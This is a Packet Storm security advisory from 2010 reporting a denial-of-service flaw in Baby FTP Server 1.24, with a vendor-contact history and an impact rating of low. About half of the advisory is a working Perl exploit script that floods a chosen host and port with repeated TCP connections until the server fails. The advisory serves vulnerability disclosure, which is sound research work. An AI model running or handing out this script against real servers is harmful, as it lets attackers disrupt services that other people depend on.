Baby FTP Server 1.24 Denial Of Service

2010-08-03T00:00:00
ID PACKETSTORM:92349
Type packetstorm
Reporter ipax
Modified 2010-08-03T00:00:00

Description

                                        
                                            `[DCA-0004]  
  
[Software]  
  
- Baby FTP Server  
  
[Vendor Product Description]  
  
- Baby FTP server has only the most necessary features and is yet  
powerful enough to be a basis for a more complex server  
  
[Bug Description]  
  
- The FTP Server can't handle multiple/simultaneous connections  
leading to Denial-of-Service  
  
[History]  
  
- Advisory sent to vendor on 06/14/2010.  
- No response from vendor  
- Public advisory & exploit 08/02/2010.  
  
[Impact]  
  
- Low  
  
[Affected Version]  
  
- Baby FTP Server v1.24  
- Prior versions may also be vulnerable  
  
[Code]  
  
#!/usr/bin/perl  
use IO::Socket;  
  
if (@ARGV < 1) {  
usage();  
}  
  
$ip = $ARGV[0];  
$port = $ARGV[1];  
$conn = $ARGV[2];  
  
$num = 0;  
  
print "[+] Sending request...\n";  
  
while ( $num <= $conn ) {  
system("echo -n .");  
$s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>  
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";  
  
close($s);  
$num++;  
}  
  
print "\n[+] Done!\n";  
  
sub usage() {  
print "[-] Usage: <". $0 ."> <host> <port> <num-conn>\n";  
print "[-] Example: ". $0 ." 127.0.0.1 21 1200\n";  
exit;  
}  
  
  
[Credits]  
  
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
  
  
[Greetz]  
Crash and all Dclabs members.  
  
--   
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
`